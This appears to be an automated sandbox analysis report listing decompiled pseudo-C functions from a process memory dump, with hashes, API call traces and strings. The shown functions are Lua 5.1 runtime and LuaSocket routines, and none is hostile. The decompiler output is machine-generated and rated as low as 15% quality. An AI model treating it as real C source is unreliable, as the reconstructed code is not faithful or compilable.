Opcode ID: dda4afdf560d1c518ff7bab58d1a0a3378af31b71ed435a1207a31d427271954
Instruction ID: 2f313b860e51cbeff923530c61ada60116807f48882b9666612413512c1417df
Opcode Fuzzy Hash: dda4afdf560d1c518ff7bab58d1a0a3378af31b71ed435a1207a31d427271954
Instruction Fuzzy Hash: 8E11D3F590420167E320DA289C85F6B77ACFF84754F440929FD49DB242E631EDA4C6E3

Uniqueness

Uniqueness Score: -1.00%

Function 10015550, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 15%

			E10015550(void* __fp0, intOrPtr* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _t29;
				signed int _t39;
				intOrPtr* _t40;
				void* _t41;

				_t40 = _a4;
				_t39 = _a8;
				if(_t39 <  *((intOrPtr*)(_t40 + 0xc))) {
					_t29 =  *((intOrPtr*)(_t40 + 0x14 + _t39 * 8));
					if(_t29 != 0xffffffff) {
						if(_t29 != 0xfffffffe) {
							goto L6;
						} else {
							_push( *((intOrPtr*)(_t40 + 0x10 + _t39 * 8)) -  *_t40 + 1);
							return E10001910(__fp0,  *((intOrPtr*)(_t40 + 8)));
						}
					} else {
						_push("unfinished capture");
						_push( *((intOrPtr*)(_t40 + 8)));
						E1000F230();
						_t41 = _t41 + 8;
						L6:
						return E10001930( *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0x10 + _t39 * 8)), _t29);
					}
				} else {
					if(_t39 != 0) {
						_push("invalid capture index");
						_push( *((intOrPtr*)(_t40 + 8)));
						return E1000F230();
					} else {
						return E10001930( *((intOrPtr*)(_t40 + 8)), _a12, _a16 - _a12);
					}
				}
			}

0x10015552
0x10015557
0x1001555e
0x10015595
0x1001559c
0x100155c8
0x00000000
0x100155ca
0x100155d6
0x100155e3
0x100155e3
0x1001559e
0x100155a1
0x100155a6
0x100155a7
0x100155ac
0x100155af
0x100155c4
0x100155c4
0x10015560
0x10015562
0x10015583
0x10015588
0x10015594
0x10015564
0x1001557f
0x1001557f
0x10015562

APIs

lua_pushlstring.LUA5.1(?,10015535,00000000,?,00000000,00000000,10015535,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 10015574

Part of subcall function 10001930: luaS_newlstr.LUA5.1(?,?,?), ref: 1000195A

luaL_error.LUA5.1(?,invalid capture index,?,00000000,00000000,10015535,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 10015589
luaL_error.LUA5.1(?,unfinished capture,?,00000000,00000000,10015535,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100155A7
lua_pushlstring.LUA5.1(?,?,?,?,00000000,00000000,10015535,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100155B9

Strings

unfinished capture, xrefs: 100155A1
invalid capture index, xrefs: 10015583

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error.lua_pushlstring.$S_newlstr.
String ID: invalid capture index$unfinished capture
API String ID: 3553447912-3651965721
Opcode ID: 6647cdc3ecc38db527e8f3b73acec9949393d76c152649ddad5fe7f888349b28
Instruction ID: 5beef89bb52250c560c8a64c756a085f8b9e0d8ebbb7b75c64fc1859d3accd2c
Opcode Fuzzy Hash: 6647cdc3ecc38db527e8f3b73acec9949393d76c152649ddad5fe7f888349b28
Instruction Fuzzy Hash: B011A3FE6107019FD200DA68EC8186BB3EADBC42B6B14491DF5658B245D631FC858770

Uniqueness

Uniqueness Score: -1.00%

Function 10016660, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10016660(void* __ecx, void* __eflags, intOrPtr _a4) {
				char* _t3;
				void* _t10;
				void* _t13;
				void* _t14;
				void* _t17;
				void* _t18;
				void* _t21;
				void* _t22;

				_t14 = __ecx;
				_t16 = _a4;
				_t15 = E1000F4A0(__eflags, _a4, 1, 0);
				_t3 = strchr(_t2, 0x2e);
				_t18 = _t17 + 0x14;
				if(_t3 != 0) {
					E10001930(_t16, _t15, _t3 - _t15);
					_t13 = E100163F0(_t14, __eflags, _t16, E100016F0(__eflags, _t16, 0xffffffff, 0), "cpath");
					_t21 = _t18 + 0x24;
					__eflags = _t13;
					if(_t13 != 0) {
						_t10 = E100161B0(__eflags, _t16, _t13, E10016600(_t16, _t15));
						_t22 = _t21 + 0x14;
						__eflags = _t10;
						if(_t10 != 0) {
							__eflags = _t10 - 2;
							if(__eflags != 0) {
								E10016560(__eflags, _t16, _t13);
								_t22 = _t22 + 8;
							}
							_push(_t13);
							E100019F0(_t16, "\n\tno module \'%s\' in file \'%s\'", _t15);
						}
					}
					return 1;
				} else {
					return _t3;
				}
			}

0x10016660
0x10016662
0x10016671
0x10016676
0x1001667c
0x10016681
0x1001668c
0x100166ad
0x100166af
0x100166b2
0x100166b4
0x100166c0
0x100166c5
0x100166c8
0x100166ca
0x100166cc
0x100166cf
0x100166d3
0x100166d8
0x100166d8
0x100166db
0x100166e3
0x100166e8
0x100166ca
0x100166f3
0x10016686
0x10016686
0x10016686

APIs

luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 1001666C

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

strchr.MSVCRT ref: 10016676
lua_pushlstring.LUA5.1(?,00000000,00000000), ref: 1001668C
lua_tolstring.LUA5.1(?,000000FF,00000000,cpath), ref: 1001669E
lua_pushfstring.LUA5.1(?,no module '%s' in file '%s',00000000,00000000,?,?,?,?,?,?,?,?,?,?,cpath), ref: 100166E3

Strings

cpath, xrefs: 10016694
no module '%s' in file '%s', xrefs: 100166DD

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_tolstring.$L_checklstring.lua_pushfstring.lua_pushlstring.strchr
String ID: no module '%s' in file '%s'$cpath
API String ID: 4158135052-2543832310
Opcode ID: 50a219fcfd248d2c4dbb57e2a70f3d1845cd9925a427702bd079bd2e2eb3a41e
Instruction ID: f39d27d0aab4ac67f16d0ff7995e0a5a3fe58111cb17e4254176ea171c1454d3
Opcode Fuzzy Hash: 50a219fcfd248d2c4dbb57e2a70f3d1845cd9925a427702bd079bd2e2eb3a41e
Instruction Fuzzy Hash: CF01DB9AA4115037F511A1292D47FFF159CCFCA6A9F050035FD04D9187E766DED280FA

Uniqueness

Uniqueness Score: -1.00%

Function 10014810, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10014810(void* __ebx, void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v0;
				signed int* _v524;
				void* __esi;
				signed int _t21;
				void* _t31;
				void* _t32;
				signed int** _t34;
				void* _t41;

				_t41 = __fp0;
				_t30 = _a4;
				_t32 = E10001150(_a4);
				E1000FC00(_t30,  &_v524);
				_t31 = 1;
				_t34 =  &(( &_v524)[3]);
				_t37 = _t32 - 1;
				if(_t32 >= 1) {
					do {
						_t21 = E1000F5C0(_t37, _t41, _t30, _t31);
						_t34 =  &(_t34[2]);
						_t38 = (_t21 & 0x000000ff) - _t21;
						if((_t21 & 0x000000ff) != _t21) {
							E1000F090(_t21, _t31, _t38, _t30, _t31, "invalid value");
							_t34 =  &(_t34[3]);
						}
						_t39 = _v524 -  &_v0;
						if(_v524 >=  &_v0) {
							E1000F9E0(_t39,  &_v524);
							_t34 =  &(_t34[1]);
						}
						 *_v524 = _t21;
						_t31 = _t31 + 1;
						_v524 =  &(_v524[0]);
					} while (_t31 <= _t32);
				}
				E1000FB40( &_v524);
				return 1;
			}

0x10014810
0x10014819
0x10014826
0x1001482e
0x10014833
0x10014838
0x1001483b
0x1001483d
0x10014840
0x10014847
0x10014849
0x10014854
0x10014856
0x1001485f
0x10014864
0x10014864
0x10014872
0x10014874
0x1001487b
0x10014880
0x10014880
0x10014887
0x1001488e
0x10014891
0x10014891
0x10014897
0x1001489d
0x100148b3

APIs

lua_gettop.LUA5.1(?), ref: 10014821
luaL_buffinit.LUA5.1(?,?,?), ref: 1001482E
luaL_checkinteger.LUA5.1(?,00000001), ref: 10014842

Part of subcall function 1000F5C0: lua_tointeger.LUA5.1(?,?), ref: 1000F5CD
Part of subcall function 1000F5C0: lua_isnumber.LUA5.1(?,?), ref: 1000F5DD

luaL_argerror.LUA5.1(?,00000001,invalid value), ref: 1001485F

Part of subcall function 1000F090: lua_getstack.LUA5.1(?,00000000), ref: 1000F0A0
Part of subcall function 1000F090: luaL_error.LUA5.1(?,bad argument #%d (%s),?,?), ref: 1000F0BC

luaL_prepbuffer.LUA5.1(?), ref: 1001487B
luaL_pushresult.LUA5.1(?), ref: 1001489D

Strings

invalid value, xrefs: 10014858

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_buffinit.L_checkinteger.L_error.L_prepbuffer.L_pushresult.lua_getstack.lua_gettop.lua_isnumber.lua_tointeger.
String ID: invalid value
API String ID: 2673964111-3106985237
Opcode ID: 7265912b92a4783eba58dd6d2daaebc0602cf8d4a6bff520dbd15ac023d430a0
Instruction ID: 68016a77fffaeb3939de681728501b2eff0c2135055e38de199b825cbe8e7786
Opcode Fuzzy Hash: 7265912b92a4783eba58dd6d2daaebc0602cf8d4a6bff520dbd15ac023d430a0
Instruction Fuzzy Hash: 340100B694438657E310EA50EC82ABF77A8DBC1280F15083DF9544B202FA35E84A93E3

Uniqueness

Uniqueness Score: -1.00%

Function 100106A0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E100106A0(void* __eflags, signed int __fp0, intOrPtr _a4) {
				intOrPtr _v4;
				void* __ecx;
				intOrPtr _t11;
				void* _t17;
				signed int _t18;
				void* _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				signed long long* _t25;
				void* _t28;

				_t31 = __fp0;
				_t28 = __eflags;
				_t22 = _a4;
				_t18 = E1000F260(_t17, _t22, 1, "collect", 0x10017500);
				_t11 = E10002280(_t22,  *((intOrPtr*)(0x10017520 + _t18 * 4)), E1000F600(_t28, __fp0, _t22, 2, 0));
				_t24 = _t23 + 0x28;
				_t20 =  *((intOrPtr*)(0x10017520 + _t18 * 4)) - 3;
				_a4 = _t11;
				if(_t20 == 0) {
					_v4 = E10002280(_t22, 4, 0);
					_t25 = _t24 + 4;
					asm("fild dword [esp+0x10]");
					_t31 = __fp0 *  *0x10017640;
					asm("fiadd dword [esp+0x18]");
					goto L5;
				} else {
					if(_t20 == 2) {
						E10001AE0(_t22, _t11);
						return 1;
					} else {
						asm("fild dword [esp+0x10]");
						_t25 = _t24 - 8;
						L5:
						 *_t25 = _t31;
						_push(_t22);
						E100018E0();
						return 1;
					}
				}
			}

0x100106a0
0x100106a0
0x100106a2
0x100106be
0x100106cf
0x100106db
0x100106de
0x100106e1
0x100106e5
0x10010712
0x10010716
0x10010719
0x1001071d
0x10010723
0x00000000
0x100106e7
0x100106ea
0x100106f7
0x10010707
0x100106ec
0x100106ec
0x100106f0
0x10010727
0x10010727
0x1001072a
0x1001072b
0x1001073b
0x1001073b
0x100106ea

APIs

luaL_checkoption.LUA5.1(?,00000001,collect,10017500), ref: 100106B4

Part of subcall function 1000F260: luaL_optlstring.LUA5.1(?,?,?,00000000), ref: 1000F279
Part of subcall function 1000F260: lua_pushfstring.LUA5.1(?,invalid option '%s',00000000), ref: 1000F2EA
Part of subcall function 1000F260: luaL_argerror.LUA5.1(?,?,00000000,?,invalid option '%s',00000000), ref: 1000F2F6

luaL_optinteger.LUA5.1(?,00000002,00000000,?,00000001,collect,10017500), ref: 100106C0

Part of subcall function 1000F600: lua_type.LUA5.1(?,?), ref: 1000F60C

lua_gc.LUA5.1(?,00000000,00000000,?,00000002,00000000,?,00000001,collect,10017500), ref: 100106CF
lua_pushboolean.LUA5.1(?,00000000), ref: 100106F7
lua_gc.LUA5.1(?,00000004,00000000), ref: 1001070D
lua_pushnumber.LUA5.1(?,00000000), ref: 1001072B

Strings

collect, xrefs: 100106AC

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_gc.$L_argerror.L_checkoption.L_optinteger.L_optlstring.lua_pushboolean.lua_pushfstring.lua_pushnumber.lua_type.
String ID: collect
API String ID: 3428933341-2751881972
Opcode ID: e370e5a4bb0e3e8cfc79287027e882750b096b63295d0903b39b0aef03d7f362
Instruction ID: 6c94b4e828dc716b794a92702795e78258ce1d8cff2578c9abc881bb3940b239
Opcode Fuzzy Hash: e370e5a4bb0e3e8cfc79287027e882750b096b63295d0903b39b0aef03d7f362
Instruction Fuzzy Hash: C9012876B0A61167E200DB589C02B9F7299EF81391F100429F284AA185DBB0F65983E7

Uniqueness

Uniqueness Score: -1.00%

Function 10010A40, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10010A40(void* __eflags, void* __fp0, intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* _t3;
				void* _t6;
				intOrPtr* _t8;
				void* _t11;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t23;

				_t27 = __fp0;
				_t23 = __eflags;
				_t14 = _a4;
				_t11 = E10001150(_a4);
				_t3 = E10001410(_t23, _a4, 1);
				_t19 = _t18 + 0xc;
				_t24 = _t3 - 4;
				if(_t3 != 4) {
					L3:
					_t16 = E1000F5C0(__eflags, _t27, _t14, 1);
					__eflags = _t16;
					if(_t16 >= 0) {
						__eflags = _t16 - _t11;
						if(_t16 > _t11) {
							_t16 = _t11;
						}
					} else {
						_t16 = _t16 + _t11;
					}
					__eflags = _t16 - 1;
					if(__eflags < 0) {
						E1000F090(_t11, _t16, __eflags, _t14, 1, "index out of range");
					}
					_t6 = _t11 - _t16;
					__eflags = _t6;
					return _t6;
				} else {
					_t8 = E100016F0(_t24, _t14, 1, 0);
					_t19 = _t19 + 0xc;
					if( *_t8 != 0x23) {
						goto L3;
					} else {
						_push(_t11 - 1);
						E10001910(__fp0, _t14);
						return 1;
					}
				}
			}

0x10010a40
0x10010a40
0x10010a42
0x10010a4f
0x10010a51
0x10010a56
0x10010a59
0x10010a5c
0x10010a85
0x10010a8e
0x10010a93
0x10010a95
0x10010a9b
0x10010a9d
0x10010a9f
0x10010a9f
0x10010a97
0x10010a97
0x10010a97
0x10010aa1
0x10010aa4
0x10010aae
0x10010ab3
0x10010ab8
0x10010ab8
0x10010abd
0x10010a5e
0x10010a63
0x10010a6a
0x10010a70
0x00000000
0x10010a72
0x10010a73
0x10010a75
0x10010a84
0x10010a84
0x10010a70

APIs

lua_gettop.LUA5.1(?), ref: 10010A47
lua_type.LUA5.1(?,00000001,?), ref: 10010A51
lua_tolstring.LUA5.1(?,00000001,00000000), ref: 10010A63
lua_pushinteger.LUA5.1(?,00000000), ref: 10010A75
luaL_checkinteger.LUA5.1(?,00000001), ref: 10010A89
luaL_argerror.LUA5.1(?,00000001,index out of range), ref: 10010AAE

Strings

index out of range, xrefs: 10010AA6

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checkinteger.lua_gettop.lua_pushinteger.lua_tolstring.lua_type.
String ID: index out of range
API String ID: 4230156580-2815927717
Opcode ID: 6d72fa16251f53c81f13a901ed9cfe70d78517c7a886d4eb5da6309969da4db2
Instruction ID: cfec5abce48c256e240dbe90c9620d54baf1b824c572c26986c178793c9a44d5
Opcode Fuzzy Hash: 6d72fa16251f53c81f13a901ed9cfe70d78517c7a886d4eb5da6309969da4db2
Instruction Fuzzy Hash: A2F0A93AF5021136E520D5641CC2BEE5259CF81AE6F450139FE84AF287E1E7ECD151D3

Uniqueness

Uniqueness Score: -1.00%

Function 00991D20, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00991D20(intOrPtr _a4) {
				void* _t2;
				void* _t8;
				intOrPtr _t9;

				_t9 = _a4;
				_t2 = E00991200(_t9, "tcp{master}", 1);
				_push(0);
				_push(2);
				_push(_t9);
				L00994B54();
				_push(3);
				_push(_t9);
				L00994B66();
				L00994BD0();
				_push(_t2);
				_t8 = E00991890(_t2, _t2);
				if(_t8 == 0) {
					_push(0x3ff00000);
					_push(0);
					_push(_t9);
					L00994B5A();
					return 1;
				} else {
					_push(_t9);
					L00994B4E();
					_push(_t8);
					_push(_t9);
					L00994AD0();
					return 2;
				}
			}

0x00991d22
0x00991d2f
0x00991d34
0x00991d36
0x00991d38
0x00991d3b
0x00991d40
0x00991d42
0x00991d45
0x00991d4a
0x00991d4f
0x00991d57
0x00991d5e
0x00991d79
0x00991d7e
0x00991d80
0x00991d81
0x00991d91
0x00991d60
0x00991d60
0x00991d61
0x00991d66
0x00991d67
0x00991d68
0x00991d78
0x00991d78

APIs

Part of subcall function 00991200: sprintf.MSVCRT ref: 0099122F
Part of subcall function 00991200: luaL_argerror.LUA5.1(?,?,?), ref: 0099123C

luaL_checklstring.LUA5.1(?,00000002,00000000,?,tcp{master},00000001), ref: 00991D3B
luaL_checknumber.LUA5.1(?,00000003,?,00000002,00000000,?,tcp{master},00000001), ref: 00991D45
_ftol.MSVCRT ref: 00991D4A

Part of subcall function 00991890: htonl.WSOCK32(00000000), ref: 009918A9
Part of subcall function 00991890: htons.WSOCK32(?), ref: 009918B7

lua_pushnil.LUA5.1(?), ref: 00991D61
lua_pushstring.LUA5.1(?,00000000,?), ref: 00991D68
lua_pushnumber.LUA5.1(?,00000000,3FF00000), ref: 00991D81

Strings

tcp{master}, xrefs: 00991D29

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checklstring.L_checknumber._ftolhtonlhtonslua_pushnil.lua_pushnumber.lua_pushstring.sprintf
String ID: tcp{master}
API String ID: 2708727405-275915469
Opcode ID: 9724bfac65b71351af364f7e95cfcd1cb249006fc1f658f743b6598d2e1bc5c4
Instruction ID: db1f12fc8f4729410cc6f005bed192a046450c2b55a507304a01d899d13b1ee7
Opcode Fuzzy Hash: 9724bfac65b71351af364f7e95cfcd1cb249006fc1f658f743b6598d2e1bc5c4
Instruction Fuzzy Hash: CDF0826674122033ED22326C6C43F9F524D8FC5765F140421F600AB282D9999D1312FD

Uniqueness

Uniqueness Score: -1.00%

Function 00993E70, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00993E70(intOrPtr _a4) {
				void* _t2;
				void* _t8;
				intOrPtr _t9;

				_t9 = _a4;
				_t2 = E00991200(_t9, "udp{unconnected}", 1);
				_push(0);
				_push(2);
				_push(_t9);
				L00994B54();
				_push(3);
				_push(_t9);
				L00994B66();
				L00994BD0();
				_push(_t2);
				_t8 = E00991890(_t2, _t2);
				if(_t8 == 0) {
					_push(0x3ff00000);
					_push(0);
					_push(_t9);
					L00994B5A();
					return 1;
				} else {
					_push(_t9);
					L00994B4E();
					_push(_t8);
					_push(_t9);
					L00994AD0();
					return 2;
				}
			}

0x00993e72
0x00993e7f
0x00993e84
0x00993e86
0x00993e88
0x00993e8b
0x00993e90
0x00993e92
0x00993e95
0x00993e9a
0x00993e9f
0x00993ea7
0x00993eae
0x00993ec9
0x00993ece
0x00993ed0
0x00993ed1
0x00993ee1
0x00993eb0
0x00993eb0
0x00993eb1
0x00993eb6
0x00993eb7
0x00993eb8
0x00993ec8
0x00993ec8

APIs

Part of subcall function 00991200: sprintf.MSVCRT ref: 0099122F
Part of subcall function 00991200: luaL_argerror.LUA5.1(?,?,?), ref: 0099123C

luaL_checklstring.LUA5.1(?,00000002,00000000,?,udp{unconnected},00000001), ref: 00993E8B
luaL_checknumber.LUA5.1(?,00000003,?,00000002,00000000,?,udp{unconnected},00000001), ref: 00993E95
_ftol.MSVCRT ref: 00993E9A

Part of subcall function 00991890: htonl.WSOCK32(00000000), ref: 009918A9
Part of subcall function 00991890: htons.WSOCK32(?), ref: 009918B7

lua_pushnil.LUA5.1(?), ref: 00993EB1
lua_pushstring.LUA5.1(?,00000000,?), ref: 00993EB8
lua_pushnumber.LUA5.1(?,00000000,3FF00000), ref: 00993ED1

Strings

udp{unconnected}, xrefs: 00993E79

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checklstring.L_checknumber._ftolhtonlhtonslua_pushnil.lua_pushnumber.lua_pushstring.sprintf
String ID: udp{unconnected}
API String ID: 2708727405-754074627
Opcode ID: 385da6f673f85cfeb9ac196fb1dd70b20cfc3cc938c67e913996bd4e7c23080f
Instruction ID: 17c4a891a23e2a565a6a172296179716608b74d0eeebe3d5e3830df381589d62
Opcode Fuzzy Hash: 385da6f673f85cfeb9ac196fb1dd70b20cfc3cc938c67e913996bd4e7c23080f
Instruction Fuzzy Hash: 43F0826274222033ED2231AC2C43F9F524D8FC6766F140421F600AB282D9999A1312FD

Uniqueness

Uniqueness Score: -1.00%

Function 00991E70, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00991E70(intOrPtr _a4) {
				void* _t2;
				void* _t3;
				intOrPtr _t10;

				_t10 = _a4;
				_t2 = E00991200(_t10, "tcp{master}", 1);
				_push(0x40400000);
				_push(0);
				_push(2);
				_push(_t10);
				L00994B72();
				L00994BD0();
				_t3 = E00994330(_t2, _t2);
				_t9 = _t3;
				if(_t3 == 0) {
					E009912A0(_t10, "tcp{server}", 1);
					_push(0x3ff00000);
					_push(0);
					_push(_t10);
					L00994B5A();
					return 1;
				} else {
					_push(_t10);
					L00994B4E();
					_push(E00994710(_t9));
					_push(_t10);
					L00994AD0();
					return 2;
				}
			}

0x00991e71
0x00991e7e
0x00991e83
0x00991e88
0x00991e8a
0x00991e8c
0x00991e8f
0x00991e94
0x00991e9b
0x00991ea0
0x00991ea7
0x00991ecf
0x00991ed4
0x00991ed9
0x00991edb
0x00991edc
0x00991eeb
0x00991ea9
0x00991ea9
0x00991eaa
0x00991eb5
0x00991eb6
0x00991eb7
0x00991ec6
0x00991ec6

APIs

Part of subcall function 00991200: sprintf.MSVCRT ref: 0099122F
Part of subcall function 00991200: luaL_argerror.LUA5.1(?,?,?), ref: 0099123C

luaL_optnumber.LUA5.1(?,00000002,00000000,40400000,?,tcp{master},00000001), ref: 00991E8F
_ftol.MSVCRT ref: 00991E94

Part of subcall function 00994330: listen.WSOCK32(?,?), ref: 00994349
Part of subcall function 00994330: WSAGetLastError.WSOCK32 ref: 00994352

lua_pushnil.LUA5.1(?), ref: 00991EAA
lua_pushstring.LUA5.1(?,00000000,00000000,?), ref: 00991EB7
lua_pushnumber.LUA5.1(?,00000000,3FF00000,?,tcp{server},00000001), ref: 00991EDC

Strings

tcp{server}, xrefs: 00991EC9
tcp{master}, xrefs: 00991E78

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorL_argerror.L_optnumber.Last_ftollistenlua_pushnil.lua_pushnumber.lua_pushstring.sprintf
String ID: tcp{master}$tcp{server}
API String ID: 477674981-1854474571
Opcode ID: 27c1b268a78308efa71a43e3e783c17d2423776648ea5af4498b1204a9487d76
Instruction ID: 4d397ff92fa904760efa3bc25f7a32315a36a97af2a77a94ea609504a1d1e62a
Opcode Fuzzy Hash: 27c1b268a78308efa71a43e3e783c17d2423776648ea5af4498b1204a9487d76
Instruction Fuzzy Hash: 77F08C7268122132ED22322C7C43FEF014D8FC6B58F550464F914BB287DA9AA99302FE

Uniqueness

Uniqueness Score: -1.00%

Function 10016D60, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45
stringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E10016D60(void* __esi, intOrPtr _a4) {
				long _t4;
				char* _t7;
				char* _t16;

				_t4 = GetModuleFileNameA(0, _t16, 0x105);
				if(_t4 == 0 || _t4 == 0x105) {
					L4:
					_push("unable to get ModuleFileName");
					_push(_a4);
					return E1000F230();
				} else {
					_t11 = _t16;
					_t7 = strrchr(_t16, 0x5c);
					_t16 =  &(_t16[8]);
					_t22 = _t7;
					if(_t7 == 0) {
						goto L4;
					} else {
						_t14 = _a4;
						 *_t7 = 0;
						E1000F840(_t11, _t14, E100016F0(_t22, _a4, 0xffffffff, 0), 0x1001ab04, _t16);
						return E100011B0(_t22, _t14, 0xfffffffe);
					}
				}
			}

0x10016d72
0x10016d7a
0x10016dd3
0x10016dda
0x10016ddf
0x10016dee
0x10016d83
0x10016d83
0x10016d8a
0x10016d90
0x10016d93
0x10016d95
0x00000000
0x10016d97
0x10016d9c
0x10016dae
0x10016dbb
0x10016dd2
0x10016dd2
0x10016d95

APIs

GetModuleFileNameA.KERNEL32(00000000,00000000,00000105), ref: 10016D72
strrchr.MSVCRT ref: 10016D8A
lua_tolstring.LUA5.1(?,000000FF,00000000,1001AB04,?,?), ref: 10016DB1
luaL_gsub.LUA5.1(?,00000000,1001AB04,?,?), ref: 10016DBB

Part of subcall function 1000F840: luaL_buffinit.LUA5.1(?,?), ref: 1000F86C
Part of subcall function 1000F840: strstr.MSVCRT ref: 1000F87A
Part of subcall function 1000F840: luaL_addlstring.LUA5.1(?,?,00000000), ref: 1000F894
Part of subcall function 1000F840: luaL_addstring.LUA5.1(?,?,?,?,00000000), ref: 1000F8A6
Part of subcall function 1000F840: strstr.MSVCRT ref: 1000F8B0
Part of subcall function 1000F840: luaL_addstring.LUA5.1(?,?), ref: 1000F8C5
Part of subcall function 1000F840: luaL_pushresult.LUA5.1(?,?,?), ref: 1000F8CF
Part of subcall function 1000F840: lua_tolstring.LUA5.1(?,000000FF,00000000,?,?,?), ref: 1000F8E0

lua_remove.LUA5.1(?,000000FE,?,00000000,1001AB04,?,?), ref: 10016DC3
luaL_error.LUA5.1(?,unable to get ModuleFileName), ref: 10016DE0

Strings

unable to get ModuleFileName, xrefs: 10016DDA

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
